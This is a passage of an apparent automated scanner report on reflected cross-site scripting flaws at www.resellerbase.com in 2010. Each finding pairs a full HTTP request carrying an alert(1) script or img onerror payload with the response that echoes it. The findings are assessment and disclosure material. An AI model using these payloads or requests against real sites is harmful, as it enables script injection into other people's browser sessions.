Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:43:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/googlepr.php?link_id=16a0a42<a>e9df8fa8e68 was not found on this server.</p>
...[SNIP]...

2.464. http://www.resellerbase.com/communication/broadband/googlepr.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/googlepr.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 607c9<script>alert(1)</script>5adb138c79b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/googlepr.php?607c9<script>alert(1)</script>5adb138c79b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/googlepr.php?607c9<script>alert(1)</script>5adb138c79b=1 was not found on this server.</p>
...[SNIP]...

2.465. http://www.resellerbase.com/communication/broadband/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f71f2<script>alert(1)</script>36f1e4e39c6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communicationf71f2<script>alert(1)</script>36f1e4e39c6/broadband/search.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communicationf71f2<script>alert(1)</script>36f1e4e39c6/broadband/search.php was not found on this server.</p>
...[SNIP]...

2.466. http://www.resellerbase.com/communication/broadband/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 508cb<script>alert(1)</script>6c30a75d6a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband508cb<script>alert(1)</script>6c30a75d6a/search.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband508cb<script>alert(1)</script>6c30a75d6a/search.php was not found on this server.</p>
...[SNIP]...

2.467. http://www.resellerbase.com/communication/broadband/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7b69d<script>alert(1)</script>6daeb9c6aa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/search.php7b69d<script>alert(1)</script>6daeb9c6aa HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/search.php7b69d<script>alert(1)</script>6daeb9c6aa was not found on this server.</p>
...[SNIP]...

2.468. http://www.resellerbase.com/communication/broadband/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /communication/broadband/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload dda42<a>e2352e44e89 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/broadband/search.php?keyword=search...&Submit3=Searchdda42<a>e2352e44e89&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/search.php?keyword=search...&Submit3=Searchdda42<a>e2352e44e89&opt=2 was not found on this server.</p>
...[SNIP]...

2.469. http://www.resellerbase.com/communication/broadband/search.php [cat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/search.php

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2c32"><img%20src%3da%20onerror%3dalert(1)>f951664db5d22ca20 was submitted in the cat parameter. This input was echoed as f2c32\"><img src=a onerror=alert(1)>f951664db5d22ca20 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /communication/broadband/search.php?cat=15f2c32"><img%20src%3da%20onerror%3dalert(1)>f951664db5d22ca20&keyword=search...&Submit3=Search&opt=1&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/search.php?cat=15&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:36:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 24834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="http://www.resellerbase.com/add.php?cat=15f2c32\"><img src=a onerror=alert(1)>f951664db5d22ca20">
...[SNIP]...

2.470. http://www.resellerbase.com/communication/broadband/search.php [cat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/search.php

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62417"><img%20src%3da%20onerror%3dalert(1)>2730a6ff81a was submitted in the cat parameter. This input was echoed as 62417\"><img src=a onerror=alert(1)>2730a6ff81a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /communication/broadband/search.php?cat=1562417"><img%20src%3da%20onerror%3dalert(1)>2730a6ff81a&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:36:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 15014

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="http://www.resellerbase.com/add.php?cat=1562417\"><img src=a onerror=alert(1)>2730a6ff81a">
...[SNIP]...

2.471. http://www.resellerbase.com/communication/broadband/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /communication/broadband/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload ecab3<a>cd8845b6305 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/broadband/search.php?keyword=search...ecab3<a>cd8845b6305&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/search.php?keyword=search...ecab3<a>cd8845b6305&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.472. http://www.resellerbase.com/communication/broadband/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2bb4b<script>alert(1)</script>16c137b50dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/search.php?2bb4b<script>alert(1)</script>16c137b50dc=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/search.php?2bb4b<script>alert(1)</script>16c137b50dc=1 was not found on this server.</p>
...[SNIP]...

2.473. http://www.resellerbase.com/communication/broadband/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /communication/broadband/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 70431<a>5b9b97c7f20 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/broadband/search.php?keyword=search...&Submit3=Search&opt=270431<a>5b9b97c7f20 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/search.php?keyword=search...&Submit3=Search&opt=270431<a>5b9b97c7f20 was not found on this server.</p>
...[SNIP]...

2.474. http://www.resellerbase.com/communication/broadband/themes/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ab7fb<script>alert(1)</script>d1258050a53 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communicationab7fb<script>alert(1)</script>d1258050a53/broadband/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communicationab7fb<script>alert(1)</script>d1258050a53/broadband/themes/ was not found on this server.</p>
...[SNIP]...

2.475. http://www.resellerbase.com/communication/broadband/themes/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2b84d<script>alert(1)</script>bad5281babd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband2b84d<script>alert(1)</script>bad5281babd/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband2b84d<script>alert(1)</script>bad5281babd/themes/ was not found on this server.</p>
...[SNIP]...

2.476. http://www.resellerbase.com/communication/broadband/themes/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f0de3<script>alert(1)</script>f81e772748f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themesf0de3<script>alert(1)</script>f81e772748f/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themesf0de3<script>alert(1)</script>f81e772748f/ was not found on this server.</p>
...[SNIP]...

2.477. http://www.resellerbase.com/communication/broadband/themes/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c5cd9<script>alert(1)</script>ca50bdc7e63 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/?c5cd9<script>alert(1)</script>ca50bdc7e63=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/?c5cd9<script>alert(1)</script>ca50bdc7e63=1 was not found on this server.</p>
...[SNIP]...

2.478. http://www.resellerbase.com/communication/broadband/themes/kosmos/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9b785<script>alert(1)</script>1481ba10dc6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication9b785<script>alert(1)</script>1481ba10dc6/broadband/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication9b785<script>alert(1)</script>1481ba10dc6/broadband/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.479. http://www.resellerbase.com/communication/broadband/themes/kosmos/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e84b3<script>alert(1)</script>2be0904de3a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadbande84b3<script>alert(1)</script>2be0904de3a/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadbande84b3<script>alert(1)</script>2be0904de3a/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.480. http://www.resellerbase.com/communication/broadband/themes/kosmos/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 601ba<script>alert(1)</script>551fc81cb15 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes601ba<script>alert(1)</script>551fc81cb15/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes601ba<script>alert(1)</script>551fc81cb15/kosmos/ was not found on this server.</p>
...[SNIP]...

2.481. http://www.resellerbase.com/communication/broadband/themes/kosmos/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9679c<script>alert(1)</script>a2a1a108622 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos9679c<script>alert(1)</script>a2a1a108622/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos9679c<script>alert(1)</script>a2a1a108622/ was not found on this server.</p>
...[SNIP]...

2.482. http://www.resellerbase.com/communication/broadband/themes/kosmos/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7c0d6<script>alert(1)</script>91f8c26408f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/?7c0d6<script>alert(1)</script>91f8c26408f=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
